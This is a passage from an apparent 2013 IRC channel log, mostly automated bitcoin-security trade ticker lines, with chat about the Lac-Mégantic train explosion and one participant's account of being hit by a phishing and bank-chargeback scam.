0.040806 BTC [-] Jul 06 06:13:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.040803 BTC [-] Jul 06 06:13:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.040803 BTC [-] Jul 06 06:13:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.040803 BTC [-] Jul 06 06:13:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.040802 BTC [-] Jul 06 06:13:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.040802 BTC [-] Jul 06 06:13:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.040801 BTC [-] Jul 06 06:13:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0408 BTC [-] Jul 06 06:13:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0407 BTC [-] Jul 06 06:13:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.04061 BTC [-] Jul 06 06:13:36 lol Jul 06 06:13:36 [BTCTC] [TAT.ASICMINER] 7 @ 0.0406 = 0.2842 BTC [-] Jul 06 06:13:38 [BTCTC] [TAT.ASICMINER] 42 @ 0.0406 = 1.7052 BTC [-] Jul 06 06:13:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.0406 BTC [-] Jul 06 06:13:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.0405 BTC [-] Jul 06 06:13:44 [BTCTC] [TAT.ASICMINER] 13 @ 0.040219 = 0.5228 BTC [-] Jul 06 06:18:55 [BTCTC] [S.MPOE-PT] 84 @ 0.00099 = 0.0832 BTC [-] Jul 06 06:19:08 [HAVELOCK] [ASICM] 1 @ 0.0395 BTC [+] Jul 06 06:19:10 [HAVELOCK] [ASICM] 109 @ 0.03999901 = 4.3599 BTC [+] Jul 06 06:19:35 ;;ticker Jul 06 06:19:35 MtGox BTCUSD ticker | Best bid: 68.83000, Best ask: 68.83499, Bid-ask spread: 0.00499, Last trade: 68.84000, 24 hour volume: 93000.15609641, 24 hour low: 65.42448, 24 hour high: 79.89999, 24 hour vwap: 70.67927 Jul 06 06:20:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.04022 = 0.0804 BTC [+] Jul 06 06:20:46 [BTCTC] [TAT.ASICMINER] 12 @ 0.040219 = 0.4826 BTC [-] Jul 06 06:20:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.0401 BTC [-] Jul 06 06:20:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.0401 BTC [-] Jul 06 06:20:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.040013 BTC [-] Jul 06 06:20:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.040013 BTC [-] Jul 06 06:20:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.040012 BTC [-] Jul 06 06:20:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.040011 BTC [-] Jul 06 06:20:56 [BTCTC] [TAT.ASICMINER] 13 @ 0.04001 = 0.5201 BTC [-] Jul 06 06:22:14 [BTCTC] [TAT.VIRTUALMINE] 94 @ 0.004499 = 0.4229 BTC [+] Jul 06 06:22:16 [BTCTC] [TAT.VIRTUALMINE] 236 @ 0.00467 = 1.1021 BTC [+] Jul 06 06:23:28 [BTCTC] [TAT.ASICMINER] 64 @ 0.041 = 2.624 BTC [+] Jul 06 06:24:44 [HAVELOCK] [ASICM] 150 @ 0.039997 = 5.9996 BTC [-] Jul 06 06:24:57 [HAVELOCK] [ASICM] 25 @ 0.039997 = 0.9999 BTC [-] Jul 06 06:25:07 [HAVELOCK] [ASICM] 2 @ 0.039997 = 0.08 BTC [-] Jul 06 06:25:49 [BTCTC] [BASIC-MINING] 9 @ 0.179949 = 1.6195 BTC [+] Jul 06 06:25:51 [BTCTC] [BASIC-MINING] 10 @ 0.17995 = 1.7995 BTC [+] Jul 06 06:27:44 [HAVELOCK] [ASICM] 3 @ 0.03999499 = 0.12 BTC [-] Jul 06 06:28:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.040011 BTC [-] Jul 06 06:28:59 [BTCTC] [TAT.ASICMINER] 3 @ 0.040011 = 0.12 BTC [-] Jul 06 06:29:13 [BTCTC] [TAT.ASICMINER] 48 @ 0.0416 = 1.9968 BTC [+] Jul 06 06:29:38 [BTCTC] [TAT.ASICMINER] 13 @ 0.0416 = 0.5408 BTC [+] Jul 06 06:29:46 [BTCTC] [TAT.ASICMINER] 8 @ 0.04001 = 0.3201 BTC [-] **** BEGIN LOGGING AT Sat Jul 6 14:28:19 2013 Jul 06 14:31:00 [HAVELOCK] [ASICM] 50 @ 0.039482 = 1.9741 BTC [+] Jul 06 14:31:45 [BTCTC] [CRYPTO-TRADE] 13 @ 0.198501 = 2.5805 BTC [+] Jul 06 14:31:49 [BTCTC] [CRYPTO-TRADE] 10 @ 0.1985 = 1.985 BTC [-] Jul 06 14:31:50 [HAVELOCK] [ASICM] 27 @ 0.039498 = 1.0664 BTC [+] Jul 06 14:31:53 [BTCTC] [CRYPTO-TRADE] 10 @ 0.198 = 1.98 BTC [-] Jul 06 14:31:55 [BTCTC] [CRYPTO-TRADE] 10 @ 0.1975 = 1.975 BTC [-] Jul 06 14:31:57 [BTCTC] [CRYPTO-TRADE] 10 @ 0.197 = 1.97 BTC [-] Jul 06 14:31:58 [BTCTC] [CRYPTO-TRADE] 47 @ 0.1966 = 9.2402 BTC [-] Jul 06 14:32:14 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Jul 06 14:32:16 [BTCTC] [ASICMINER-PT] 1 @ 4.1405 BTC [-] Jul 06 14:32:18 [BTCTC] [ASICMINER-PT] 1 @ 4.1402 BTC [-] Jul 06 14:32:43 [HAVELOCK] [ASICM] 300 @ 0.039498 = 11.8494 BTC [+] Jul 06 14:41:14 [BTCTC] [TAT.ASICMINER] 23 @ 0.041747 = 0.9602 BTC [+] Jul 06 14:42:26 [BTCTC] [DMS.MINING] 1 @ 0.020497 BTC [+] Jul 06 14:49:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.041747 BTC [+] Jul 06 14:51:21 [BTCTC] [ASICMINER-PT] 1 @ 4.13888 BTC [-] Jul 06 14:51:23 [BTCTC] [ASICMINER-PT] 3 @ 4.13 = 12.39 BTC [-] Jul 06 14:51:24 [BTCTC] [ASICMINER-PT] 1 @ 4.12 BTC [-] Jul 06 14:51:26 [BTCTC] [ASICMINER-PT] 5 @ 4.11 = 20.55 BTC [-] Jul 06 15:04:27 [BTCTC] [TAT.ASICMINER] 25 @ 0.040603 = 1.0151 BTC [-] Jul 06 15:06:18 [BTCTC] [BFMINES] 250 @ 0.004 = 1 BTC [+] Jul 06 15:08:24 [BTCTC] [DMS.MINING] 20 @ 0.02001 = 0.4002 BTC [-] Jul 06 15:08:26 [BTCTC] [DMS.MINING] 188 @ 0.02 = 3.76 BTC [-] Jul 06 15:09:10 [BTCTC] [DMS.PURCHASE] 195 @ 0.049181 = 9.5903 BTC [+] Jul 06 15:11:36 [MPEX] [S.MPOE] 3600 @ 0.00080891 = 2.9121 BTC [+] Jul 06 15:14:19 [BTCTC] [S.MPOE-PT] 1 @ 0.00099 BTC [-] Jul 06 15:18:10 [BTCTC] [BASIC-MINING] 10 @ 0.170104 = 1.701 BTC [-] Jul 06 15:18:13 [BTCTC] [BASIC-MINING] 10 @ 0.170103 = 1.701 BTC [-] Jul 06 15:18:15 [BTCTC] [BASIC-MINING] 10 @ 0.170102 = 1.701 BTC [-] Jul 06 15:18:16 [BTCTC] [BASIC-MINING] 3 @ 0.1701 = 0.5103 BTC [-] Jul 06 15:18:18 [BTCTC] [BASIC-MINING] 27 @ 0.170002 = 4.5901 BTC [-] Jul 06 15:22:00 [BTCTC] [ASICMINER-PT] 2 @ 4.11 = 8.22 BTC [-] Jul 06 15:23:34 http://trilema.com/2013/if-youre-using-wp-super-cache/ Jul 06 15:23:41 If you’re using WP Super Cache… pe Trilema - Un blog de Mircea Popescu. Jul 06 15:24:15 [MPEX] [S.MPOE] 23850 @ 0.00080865 = 19.2863 BTC [-] Jul 06 15:25:12 [BTCTC] [AMC-PT] 1391 @ 0.001941 = 2.6999 BTC [+] Jul 06 15:25:14 [BTCTC] [AMC-PT] 100 @ 0.001942 = 0.1942 BTC [+] Jul 06 15:25:16 [BTCTC] [AMC-PT] 625 @ 0.001944 = 1.215 BTC [+] Jul 06 15:25:17 [BTCTC] [AMC-PT] 100 @ 0.001975 = 0.1975 BTC [+] Jul 06 15:30:15 [BTCTC] [ASICMINER-PT] 3 @ 4.08 = 12.24 BTC [-] Jul 06 15:41:40 [HAVELOCK] [ASICM] 151 @ 0.039494 = 5.9636 BTC [-] Jul 06 15:42:51 [BTCTC] [BASIC-MINING] 10 @ 0.179 = 1.79 BTC [+] Jul 06 15:42:53 [BTCTC] [BASIC-MINING] 10 @ 0.179995 = 1.8 BTC [+] Jul 06 15:42:55 [BTCTC] [BASIC-MINING] 3 @ 0.181 = 0.543 BTC [+] **** BEGIN LOGGING AT Sat Jul 6 15:52:03 2013 Jul 06 15:57:23 [BTCTC] [TAT.ASICMINER] 25 @ 0.040603 = 1.0151 BTC [-] Jul 06 15:58:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.040602 = 0.406 BTC [-] Jul 06 15:59:04 [BTCTC] [TAT.ASICMINER] 20 @ 0.0402 = 0.804 BTC [-] Jul 06 15:59:47 [HAVELOCK] [ASICM] 151 @ 0.03949 = 5.963 BTC [-] Jul 06 15:59:49 [HAVELOCK] [ASICM] 27 @ 0.039491 = 1.0663 BTC [+] Jul 06 15:59:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.0401 = 0.401 BTC [-] Jul 06 16:00:37 [BTCTC] [TAT.ASICMINER] 33 @ 0.04003 = 1.321 BTC [-] Jul 06 16:01:34 [BTCTC] [TAT.ASICMINER] 33 @ 0.04002 = 1.3207 BTC [-] Jul 06 16:02:27 [BTCTC] [TAT.ASICMINER] 13 @ 0.040001 = 0.52 BTC [-] Jul 06 16:02:33 [MPEX] [S.MPOE] 11850 @ 0.00080455 = 9.5339 BTC [-] Jul 06 16:05:53 is theymos sometimes here? Jul 06 16:07:32 jimmy2k: try #bitcoin Jul 06 16:08:23 [BTCTC] [DMS.SELLING] 84 @ 0.02969 = 2.494 BTC [+] Jul 06 16:08:25 [BTCTC] [DMS.SELLING] 20 @ 0.029693 = 0.5939 BTC [+] Jul 06 16:08:26 [BTCTC] [DMS.SELLING] 15 @ 0.029694 = 0.4454 BTC [+] Jul 06 16:08:28 [BTCTC] [DMS.SELLING] 15 @ 0.029698 = 0.4455 BTC [+] Jul 06 16:08:29 [BTCTC] [DMS.SELLING] 73 @ 0.0297 = 2.1681 BTC [+] Jul 06 16:13:45 [BTCTC] [S.DICE-PT] 1 @ 0.0025 BTC [+] Jul 06 16:14:19 [HAVELOCK] [ASICM] 52 @ 0.039479 = 2.0529 BTC [-] Jul 06 16:14:21 [HAVELOCK] [ASICM] 53 @ 0.03948 = 2.0924 BTC [+] Jul 06 16:14:22 [HAVELOCK] [ASICM] 45 @ 0.039491 = 1.7771 BTC [+] Jul 06 16:21:49 [BTCTC] [DMS.SELLING] 20 @ 0.0273 = 0.546 BTC [-] Jul 06 16:21:51 [BTCTC] [DMS.SELLING] 1 @ 0.027225 BTC [-] Jul 06 16:21:53 [BTCTC] [DMS.SELLING] 179 @ 0.027222 = 4.8727 BTC [-] Jul 06 16:24:05 [HAVELOCK] [ASICM] 17 @ 0.039498 = 0.6715 BTC [+] Jul 06 16:24:32 [HAVELOCK] [ASICM] 6 @ 0.039498 = 0.237 BTC [+] Jul 06 16:25:59 [BTCTC] [DMS.MINING] 1 @ 0.019902 BTC [-] Jul 06 16:26:02 [BTCTC] [DMS.MINING] 40 @ 0.0198 = 0.792 BTC [-] Jul 06 16:26:07 [BTCTC] [DMS.MINING] 100 @ 0.0197 = 1.97 BTC [-] Jul 06 16:26:09 [BTCTC] [DMS.MINING] 59 @ 0.01962 = 1.1576 BTC [-] Jul 06 16:35:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.040011 BTC [+] Jul 06 16:39:04 [BTCTC] [DMS.MINING] 2 @ 0.02 = 0.04 BTC [+] Jul 06 16:42:20 [BTCTC] [DMS.MINING] 50 @ 0.02 = 1 BTC [+] Jul 06 16:45:33 Namworld were you in quebec ? Jul 06 16:49:07 [BTCTC] [DMS.PURCHASE] 20 @ 0.049181 = 0.9836 BTC [+] Jul 06 16:55:27 http://www.zerohedge.com/node/476089#comment-3725102 << lol Jul 06 16:55:33 Margin Calls Coming On US Too-Big-To-Fail Banks | Zero Hedge Jul 06 16:58:20 [HAVELOCK] [KCIM] 4 @ 0.8 = 3.2 BTC [-] Jul 06 17:03:46 If I were? The city or the province? Jul 06 17:03:52 apparently it just exploded Jul 06 17:04:57 It just exploded? Someone nuked the city of Quebec? Jul 06 17:05:06 Sounds plausible... Jul 06 17:05:28 lol Jul 06 17:05:32 apparently some fuel train Jul 06 17:05:48 http://www.radio-canada.ca/regions/estrie/2013/07/06/001-explosion-lac-megantic-train.shtml Jul 06 17:06:48 Yup. Nuke mushroom. Jul 06 17:06:57 (fake) Jul 06 17:07:49 hm ? Jul 06 17:07:53 is it a fake report ?~! Jul 06 17:07:58 Doesn't look fake to me. Jul 06 17:08:07 No, fake nuke Jul 06 17:08:15 It's fuel mushroom Jul 06 17:08:40 a a Jul 06 17:10:04 That's kinda remote town... but ouch. Jul 06 17:10:11 [MPEX] [S.MPOE] 1500 @ 0.00080455 = 1.2068 BTC [-] Jul 06 17:10:13 [MPEX] [S.MPOE] 3500 @ 0.0008043 = 2.8151 BTC [-] Jul 06 17:10:27 https://maps.google.ca/maps?q=lac+megantic&ie=UTF8&ll=45.996962,-70.059814&spn=4.808363,13.809814&safe=off&hnear=Lac-M%C3%A9gantic,+Le+Granit+Regional+County+Municipality,+Quebec&gl=ca&t=h&z=7 Jul 06 17:10:30 lac megantic - Google Maps Jul 06 17:11:28 [MPEX] [S.MPOE] 3200 @ 0.0008043 = 2.5738 BTC [-] Jul 06 17:12:13 [BTCTC] [TAT.ASICMINER] 19 @ 0.040021 = 0.7604 BTC [+] Jul 06 17:14:30 [BTCTC] [TAT.ASICMINER] 21 @ 0.040021 = 0.8404 BTC [+] Jul 06 17:14:36 [BTCTC] [DMS.MINING] 100 @ 0.019621 = 1.9621 BTC [-] Jul 06 17:14:37 [BTCTC] [DMS.MINING] 1 @ 0.019621 BTC [-] Jul 06 17:14:40 [BTCTC] [DMS.MINING] 53 @ 0.01962 = 1.0399 BTC [-] Jul 06 17:14:43 [BTCTC] [DMS.MINING] 99 @ 0.019608 = 1.9412 BTC [-] Jul 06 17:15:16 [BTCTC] [TAT.ASICMINER] 24 @ 0.040021 = 0.9605 BTC [+] Jul 06 17:15:37 [BTCTC] [TAT.ASICMINER] 50 @ 0.040789 = 2.0395 BTC [+] Jul 06 17:15:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.04079 = 0.204 BTC [+] Jul 06 17:15:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.04099 = 0.4099 BTC [+] Jul 06 17:15:55 whats the time there now, 10? Jul 06 17:16:33 [BTCTC] [TAT.VIRTUALMINE] 383 @ 0.00469 = 1.7963 BTC [-] Jul 06 17:16:48 [BTCTC] [AMC-PT] 1 @ 0.001802 BTC [-] Jul 06 17:17:44 [BTCTC] [AMC-PT] 399 @ 0.001802 = 0.719 BTC [-] Jul 06 17:18:33 imagine how it must suck to be nicely minding your own business atop some choice canadian pussy at 1 in the morning when suddenly they want you to move!!! Jul 06 17:19:59 [BTCTC] [DMS.PURCHASE] 3 @ 0.048007 = 0.144 BTC [-] Jul 06 17:20:00 [BTCTC] [DMS.PURCHASE] 10 @ 0.048001 = 0.48 BTC [-] Jul 06 17:20:02 [BTCTC] [DMS.PURCHASE] 5 @ 0.046401 = 0.232 BTC [-] Jul 06 17:20:03 [BTCTC] [DMS.PURCHASE] 2 @ 0.0464 = 0.0928 BTC [-] Jul 06 17:22:09 [BTCTC] [S.BBET-PT] 5 @ 0.00131 = 0.0066 BTC [-] Jul 06 17:22:12 [BTCTC] [S.BBET-PT] 3 @ 0.00131 = 0.0039 BTC [-] Jul 06 17:22:20 [BTCTC] [S.BBET-PT] 2 @ 0.0013 = 0.0026 BTC [-] Jul 06 17:22:23 [BTCTC] [S.BBET-PT] 100 @ 0.001281 = 0.1281 BTC [-] Jul 06 17:22:25 [BTCTC] [S.BBET-PT] 200 @ 0.00128 = 0.256 BTC [-] Jul 06 17:22:27 [BTCTC] [S.BBET-PT] 10 @ 0.00127 = 0.0127 BTC [-] Jul 06 17:22:37 [BTCTC] [S.BBET-PT] 100 @ 0.00126 = 0.126 BTC [-] Jul 06 17:22:39 [BTCTC] [S.BBET-PT] 1 @ 0.00126 BTC [-] Jul 06 17:22:41 [BTCTC] [S.BBET-PT] 159 @ 0.001255 = 0.1995 BTC [-] Jul 06 17:22:42 [BTCTC] [S.BBET-PT] 16 @ 0.00125 = 0.02 BTC [-] Jul 06 17:22:49 [BTCTC] [S.BBET-PT] 2 @ 0.00125 = 0.0025 BTC [-] Jul 06 17:26:06 [BTCTC] [PAJKA.BOND] 4 @ 0.053 = 0.212 BTC [-] Jul 06 17:26:08 [BTCTC] [PAJKA.BOND] 4 @ 0.0503 = 0.2012 BTC [-] Jul 06 17:26:10 [BTCTC] [PAJKA.BOND] 1 @ 0.0502 BTC [-] Jul 06 17:26:11 [BTCTC] [PAJKA.BOND] 1 @ 0.050002 BTC [-] Jul 06 17:26:13 [BTCTC] [PAJKA.BOND] 10 @ 0.05 = 0.5 BTC [-] Jul 06 17:27:02 http://www.zerohedge.com/contributed/2013-07-04/say-hello-inflation-inflation-dead Jul 06 17:27:07 Say Hello to Inflation, Inflation is Dead | Zero Hedge Jul 06 17:27:17 o looky, americans are starting to wise up to the fact the dollar inflation is about 10% a year. Jul 06 17:27:24 only took em half a decade. Jul 06 17:28:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.0408 BTC [-] Jul 06 17:28:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.04003 = 0.4003 BTC [-] Jul 06 17:28:50 [BTCTC] [TAT.ASICMINER] 30 @ 0.040021 = 1.2006 BTC [-] Jul 06 17:28:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.040011 BTC [-] Jul 06 17:28:54 [BTCTC] [TAT.ASICMINER] 62 @ 0.04001 = 2.4806 BTC [-] Jul 06 17:31:28 https://bitcointalk.org/index.php?topic=251186.new#new Jul 06 17:31:34 22000 USD SCAM because of Phishing and Bank Transfer Chargeback Jul 06 17:31:43 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00469 = 0.0235 BTC [-] Jul 06 17:32:05 thx for any kind of help Jul 06 17:32:30 What now Jul 06 17:33:19 [HAVELOCK] [ASICM] 1 @ 0.039498 BTC [+] Jul 06 17:33:41 [HAVELOCK] [ASICM] 2 @ 0.039499 = 0.079 BTC [+] Jul 06 17:34:01 [MPEX] [S.MPOE] 4800 @ 0.0008043 = 3.8606 BTC [-] Jul 06 17:34:30 jborkl jcpham Jezzz jimmy2k joeykrim jordandotdev jurov Jul 06 17:34:40 jimmy2k so you had the entire history pulled back. Jul 06 17:34:48 how long ago was the first payment from the scammer ? Jul 06 17:35:21 last week wednesday i think Jul 06 17:35:43 and the funds were pulled thursday ie two days ago ? Jul 06 17:35:46 last week friday was the freezing of my bank account and the accusation against me Jul 06 17:35:55 aha so days apart. Jul 06 17:36:16 yeah friday of last week was the chargeback of the money from the first transaction Jul 06 17:36:25 sepa chargeback eh Jul 06 17:36:35 myeah. Jul 06 17:36:43 sucks jimmy2k Jul 06 17:36:48 the world aint what it used to be Jul 06 17:37:43 [BTCTC] [DMS.PURCHASE] 5 @ 0.04918 = 0.2459 BTC [+] Jul 06 17:37:45 [BTCTC] [DMS.PURCHASE] 145 @ 0.049181 = 7.1312 BTC [+] Jul 06 17:38:27 payment, so that I can be sure that I will receive the money on the next day! After that a really strange thing happened! He sent me the login data for his clients online banking account and told me I should just log in and check for a proof! This was completely suspicious to me and I immediately decided to go to the police the next day... Then everything changed... Jul 06 17:38:29 [BTCTC] [ASICMINER-PT] 1 @ 4.29899 BTC [+] Jul 06 17:38:33 ouch. you actually did that jimmy2k ? Jul 06 17:38:48 [BTCTC] [DMS.MINING] 100 @ 0.019204 = 1.9204 BTC [-] Jul 06 17:38:50 [BTCTC] [DMS.MINING] 41 @ 0.019203 = 0.7873 BTC [-] Jul 06 17:38:51 [BTCTC] [DMS.MINING] 1 @ 0.019201 BTC [-] Jul 06 17:38:53 [BTCTC] [DMS.MINING] 10 @ 0.019 = 0.19 BTC [-] Jul 06 17:38:54 [BTCTC] [DMS.MINING] 1 @ 0.019 BTC [-] Jul 06 17:39:12 you mean whether I logged in? Jul 06 17:39:49 yes Jul 06 17:40:45 yes, because I thought thats a joke or something and just wanted to try it. Also I thought if it would be fraud why should he provide me this info to cause suspision. so i thought i just log in and check. i mean i couldnt do anything without the tans anyway Jul 06 17:41:12 after i was in I felt that here is something strange going on and immediately logged of Jul 06 17:41:16 see, it was a trap. Jul 06 17:41:29 you logging in from your home links you to the phishing he was doing. Jul 06 17:41:31 I told this the police so that i am free of any danger Jul 06 17:41:43 you telling is not necessarily you being believed. Jul 06 17:41:50 have you hired a lawyer yet ? Jul 06 17:42:10 yes, but the data was posted in the chat too and i can prove that i only logged in after receivinig the data from him Jul 06 17:42:30 so i think this is not dangerous for me. the only thing is really to get my fu... money back Jul 06 17:43:11 [BTCTC] [PAJKA.BOND] 10 @ 0.045201 = 0.452 BTC [-] Jul 06 17:43:13 [BTCTC] [PAJKA.BOND] 1 @ 0.0452 BTC [-] Jul 06 17:43:14 let me explain something to you. if you are named as an accessory to identity theft computer fraud etc, Jul 06 17:43:15 [BTCTC] [PAJKA.BOND] 9 @ 0.04 = 0.36 BTC [-] Jul 06 17:43:26 you will spend way more than 22k on legal fees over the next decade. Jul 06 17:43:46 logging in was really a dumb move Jul 06 17:43:58 ima write this one up, it's fucking devious. Jul 06 17:44:14 are we still discussing this one? Jul 06 17:44:35 yes. it's pretty remarkable tbh. Jul 06 17:47:22 mircea_popescu, you are right. the police anyway doesnt cost me money Jul 06 17:47:48 I wont use a lawyer for doing research since i dont think he can help me here much Jul 06 17:48:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.04099 = 0.4099 BTC [+] Jul 06 17:48:29 I just asked him some stuff about my situation and what moves would be best to do next Jul 06 17:48:58 and about things like accusing the phishing victims for not taking care of their data Jul 06 17:49:29 [BTCTC] [ASICMINER-PT] 5 @ 4.298999 = 21.495 BTC [+] Jul 06 17:55:32 [BTCTC] [ASICMINER-PT] 5 @ 4.295 = 21.475 BTC [-] Jul 06 17:57:30 [HAVELOCK] [ASICM] 1 @ 0.039499 BTC [+] Jul 06 18:03:34 [MPEX] [S.MPOE] 15600 @ 0.0008043 = 12.5471 BTC [-] Jul 06 18:03:36 [MPEX] [S.MPOE] 29400 @ 0.00080395 = 23.6361 BTC [-] Jul 06 18:03:38 [MPEX] [S.MPOE] 20350 @ 0.00079914 = 16.2625 BTC [-] Jul 06 18:03:40 [MPEX] [S.MPOE] 6685 @ 0.00079835 = 5.337 BTC [-] Jul 06 18:04:26 No good TV is on Jul 06 18:07:40 jimmy2k sounds reasonable. Jul 06 18:16:54 [BTCTC] [DMS.PURCHASE] 65 @ 0.049181 = 3.1968 BTC [+] Jul 06 18:17:35 [BTCTC] [DMS.PURCHASE] 1 @ 0.049181 BTC [+] Jul 06 18:20:37 [HAVELOCK] [ASICM] 50 @ 0.039499 = 1.975 BTC [+] Jul 06 18:23:45 [BTCTC] [DMS.PURCHASE] 50 @ 0.049181 = 2.4591 BTC [+] Jul 06 18:24:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.041685 = 0.1251 BTC [+] Jul 06 18:28:50 http://www.google.com/landing/solarimpulse/ Jul 06 18:34:20 [BTCTC] [BFMINES] 1 @ 0.004 BTC [+] Jul 06 18:44:14 [BTCTC] [BITVPS] 39 @ 0.001987 = 0.0775 BTC [+] Jul 06 18:46:12 [BTCTC] [TAT.ASICMINER] 19 @ 0.041685 = 0.792 BTC [+] Jul 06 18:46:57 [BTCTC] [TAT.ASICMINER] 28 @ 0.041685 = 1.1672 BTC [+] Jul 06 18:48:08 jimmy2k http://trilema.com/2013/vultures-vultures-everywhere/ Jul 06 18:48:12 there, you inspire. Jul 06 18:49:22 [BTCTC] [ASICMINER-PT] 2 @ 4.29495 = 8.5899 BTC [-] Jul 06 18:50:58 [BTCTC] [TAT.ASICMINER] 23 @ 0.041686 = 0.9588 BTC [+] Jul 06 18:51:00 [BTCTC] [TAT.ASICMINER] 8 @ 0.041688 = 0.3335 BTC [+] Jul 06 18:51:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.04169 = 0.2085 BTC [+] Jul 06 18:51:04 [BTCTC] [TAT.ASICMINER] 42 @ 0.041709 = 1.7518 BTC [+] Jul 06 18:51:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.041748 BTC [+] Jul 06 18:51:07 [BTCTC] [TAT.ASICMINER] 8 @ 0.0418 = 0.3344 BTC [+] Jul 06 18:53:35 [BTCTC] [TAT.ASICMINER] 5 @ 0.0422 = 0.211 BTC [+] Jul 06 18:53:37 [BTCTC] [TAT.ASICMINER] 5 @ 0.0422 = 0.211 BTC [+] Jul 06 18:53:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.0423 = 0.423 BTC [+] Jul 06 18:53:39 [BTCTC] [TAT.ASICMINER] 23 @ 0.042336 = 0.9737 BTC [+] Jul 06 18:53:50 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [-] Jul 06 18:55:31 [MPEX] [S.MPOE] 22250 @ 0.00080091 = 17.8202 BTC [+] Jul 06 18:57:07 [BTCTC] [BASIC-MINING] 3 @ 0.1799 = 0.5397 BTC [-] Jul 06 18:57:08 [BTCTC] [BASIC-MINING] 4 @ 0.181 = 0.724 BTC [+] Jul 06 18:59:04 [BTCTC] [DMS.MINING] 2 @ 0.019799 = 0.0396 BTC [+] Jul 06 18:59:25 [BTCTC] [DMS.MINING] 10 @ 0.0198 = 0.198 BTC [+] Jul 06 19:01:43 mp: lieing should be lying Jul 06 19:02:23 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00469 = 0.0235 BTC [-] Jul 06 19:02:31 tis the sort of article that should be linked weekly Jul 06 19:06:03 [BTCTC] [DMS.MINING] 1 @ 0.019799 BTC [-] Jul 06 19:06:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.042399 BTC [+] Jul 06 19:08:50 [BTCTC] [ASICMINER-PT] 5 @ 4.130003 = 20.65 BTC [-] Jul 06 19:09:09 [BTCTC] [S.DICE-PT] 98 @ 0.0025 = 0.245 BTC [+] Jul 06 19:09:16 [BTCTC] [S.DICE-PT] 302 @ 0.0025 = 0.755 BTC [+] Jul 06 19:09:37 ty! Jul 06 19:11:00 [MPEX] [S.MPOE] 4187 @ 0.00080091 = 3.3534 BTC [+] Jul 06 19:11:01 [MPEX] [S.MPOE] 6350 @ 0.00080163 = 5.0904 BTC [+] Jul 06 19:13:27 [BTCTC] [BFMINES] 25 @ 0.004 = 0.1 BTC [+] Jul 06 19:17:55 [BTCTC] [TAT.ASICMINER] 20 @ 0.042299 = 0.846 BTC [-] Jul 06 19:19:33 [BTCTC] [TAT.ASICMINER] 15 @ 0.042299 = 0.6345 BTC [-] Jul 06 19:20:55 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.00469 = 0.1173 BTC [-] Jul 06 19:21:01 [BTCTC] [BFMINES] 4 @ 0.004 = 0.016 BTC [+] Jul 06 19:21:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.042299 BTC [-] Jul 06 19:23:34 [MPEX] [S.MPOE] 2613 @ 0.00080327 = 2.0989 BTC [+] Jul 06 19:23:36 [MPEX] [S.MPOE] 16400 @ 0.00080461 = 13.1956 BTC [+] Jul 06 19:23:53 [MPEX] [S.MPOE] 7700 @ 0.00080589 = 6.2054 BTC [+] Jul 06 19:26:12 [BTCTC] [AMC-PT] 75 @ 0.001999 = 0.1499 BTC [+] Jul 06 19:26:27 [BTCTC] [S.DICE-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 06 19:26:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.0421 = 0.1263 BTC [-] Jul 06 19:28:37 [HAVELOCK] [ASICM] 53 @ 0.039499 = 2.0934 BTC [+] Jul 06 19:31:13 [HAVELOCK] [ASICM] 50 @ 0.039499 = 1.975 BTC [+] Jul 06 19:32:06 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004272 = 0.4272 BTC [-] Jul 06 19:34:09 [HAVELOCK] [ASICM] 100 @ 0.039499 = 3.9499 BTC [+] Jul 06 19:34:28 [BTCTC] [ASICMINER-PT] 1 @ 4.151 BTC [+] Jul 06 19:35:22 [BTCTC] [AMC-PT] 40 @ 0.001999 = 0.08 BTC [+] Jul 06 19:36:44 [BTCTC] [ASICMINER-PT] 1 @ 4.151 BTC [+] Jul 06 19:39:45 http://nerdr.com/bitcoin-exchange-scam-bitcoins-are-worthless/ Jul 06 19:39:47 the jig. Jul 06 19:39:49 Bitcoin Exchange Scam – Bitcoins Are Now Worthless | NERDr.com Jul 06 19:42:02 "We all know Bitcoin is a sham, it’s a pyramid scheme" Jul 06 19:43:48 [BTCTC] [BFMINES] 4 @ 0.004 = 0.016 BTC [+] Jul 06 19:43:52 "Is, and always will be a scam… You can’t even find a real answer about bitcoins, even after you dig for hours through hundreds of links. Useless programs, useless dead sites, useless" Jul 06 19:43:56 it's pretty fucking great. Jul 06 19:44:40 their adsetup is a scam :) Jul 06 19:45:51 well tha'ts ok, cause it's theirs. Jul 06 19:46:07 